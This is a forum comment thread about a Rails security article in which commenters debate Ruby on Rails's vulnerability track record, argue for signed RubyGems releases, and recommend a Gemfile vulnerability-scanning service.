

A week with a Rails Security Strategy: More security, new habits - hawe
https://www.airpair.com/ruby-on-rails/posts/a-week-with-a-rails-security-strategy

======
LunaSea
I didn't even know there was such a thing as "Ruby on Rails Security".

~~~
LunaSea
To the people downvoting me:

\- [http://www.cvedetails.com/product/22568/Rubyonrails-Ruby-
On-...](http://www.cvedetails.com/product/22568/Rubyonrails-Ruby-On-
Rails.html?vendor_id=12043)

\- [http://www.cvedetails.com/vulnerability-
list/vendor_id-12043...](http://www.cvedetails.com/vulnerability-
list/vendor_id-12043/product_id-22568/Rubyonrails-Ruby-On-Rails.html)

~~~
astrodust
It's a complicated platform, but on the whole has a very good track record.

Picking on it for having vulnerabilities without providing something in the
way of a comparison is not very meaningful.

~~~
trimble-alum
It's imporant to pick out vulnerabilities and deficiencies compared to other
projects to get them addressed, rather than only say nice things. However, the
core issue is that people raising them are usually ignored until there's an
embarrassing hack or demonstration (Homakov).

For example, all new gem releases should be signed and `HighSecurity` should
be the policy but it's taken years to get very little progress. Changing to
that policy would prevent entire classes of attacks, attacks that could subtly
inject code into all sorts of apps in difficult-to-find ways. Large projects
are still shipping unsigned gems, unsigned commits and unsigned tags. If
RubyGems were hacked, progress might move slightly faster.

~~~
astrodust
Rubygems has been lagging behind other packagers like Apt, RPM, NPM, and even
newer things like Rust's Cargo. It's woefully overdue for an update.

That being said, there's great services like GemCanary
([https://gemcanary.com/](https://gemcanary.com/)) that will read your Gemfile
and produce a list of vulnerable packages for you automatically. It'll even
email you alerts when there's problems.

The security story in Rails might not be perfect, but at least there's
reporting and tools.

Keep pushing for signed packages, though. Long overdue.

